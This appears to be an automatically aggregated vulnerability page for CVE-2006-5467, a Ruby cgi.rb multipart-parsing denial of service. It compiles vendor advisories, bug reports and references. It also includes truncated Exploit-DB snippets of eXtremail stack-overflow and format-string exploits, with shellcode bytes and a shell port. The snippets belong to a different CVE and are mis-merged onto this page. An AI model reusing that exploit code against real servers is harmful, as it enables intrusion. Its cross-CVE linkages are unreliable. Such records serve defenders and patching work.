CVE-2006-5467
published 2006-10-27
Priority: P4 · 21 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS: 4.07% (89.4th percentile)
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat · 5.0 MEDIUM
Red Hat
ruby's cgi.rb vulnerable infinite loop DoS
vendor_redhat·2006-12-04·CVSS 5.0
CVE-2006-6303 [MEDIUM] CWE-835 ruby's cgi.rb vulnerable infinite loop DoS
The read_multipart function in cgi.rb in Ruby before 1.8.5-p2 does not properly detect boundaries in MIME multipart content, which allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP requests, a different issue than CVE-2006-5467.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Ubuntu
Ruby vulnerability
vendor_ubuntu·2006-11-01
CVE-2006-5467 Ruby vulnerability
An error was found in Ruby's CGI library that did not correctly check
for the end of multipart MIME requests. Using a crafted HTTP request, a
remote user could cause a denial of service, where Ruby CGI applications
would end up in a loop, monopolizing a CPU.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
Ruby CGI multipart parsing DoS
vendor_redhat·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] Ruby CGI multipart parsing DoS
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
GHSA
GHSA-cgqx-jwj4-2jc4: The cgi
ghsa_unreviewed·2022-05-03
CVE-2006-5467 [MEDIUM] GHSA-cgqx-jwj4-2jc4: The cgi
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
GHSA
GHSA-fx2r-qhmq-3jjp: The read_multipart function in cgi
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-6303 [MEDIUM] GHSA-fx2r-qhmq-3jjp: The read_multipart function in cgi
The read_multipart function in cgi.rb in Ruby before 1.8.5-p2 does not properly detect boundaries in MIME multipart content, which allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP requests, a different issue than CVE-2006-5467.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-26·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
+++ This bug was initially created as a clone of Bug #212237 +++
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
-- Additional comment from bressers@red
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Created attachment 139389
Proposed pat
ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P
http://docs.info.apple.com/article.html?artnum=305530
http://lists.apple.com/archives/security-announce/2007/May/msg00004.html
http://rubyforge.org/pipermail/mongrel-users/2006-October/001946.html
http://secunia.com/advisories/22615
http://secunia.com/advisories/22624
http://secunia.com/advisories/22761
http://secunia.com/advisories/22929
http://secunia.com/advisories/22932
http://secunia.com/advisories/23040
http://secunia.com/advisories/23344
http://secunia.com/advisories/25402
http://security.gentoo.org/glsa/glsa-200611-12.xml
http://securitytracker.com/id?1017194
http://www.debian.org/security/2006/dsa-1234
http://www.debian.org/security/2006/dsa-1235
http://www.mandriva.com/security/advisories?name=MDKSA-2006:192
http://www.novell.com/linux/security/advisories/2006_26_sr.html
http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.030-ruby.html
http://www.redhat.com/support/errata/RHSA-2006-0729.html
http://www.securityfocus.com/bid/20777
http://www.ubuntu.com/usn/usn-371-1
http://www.vupen.com/english/advisories/2006/4244
http://www.vupen.com/english/advisories/2006/4245
http://www.vupen.com/english/advisories/2007/1939
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10185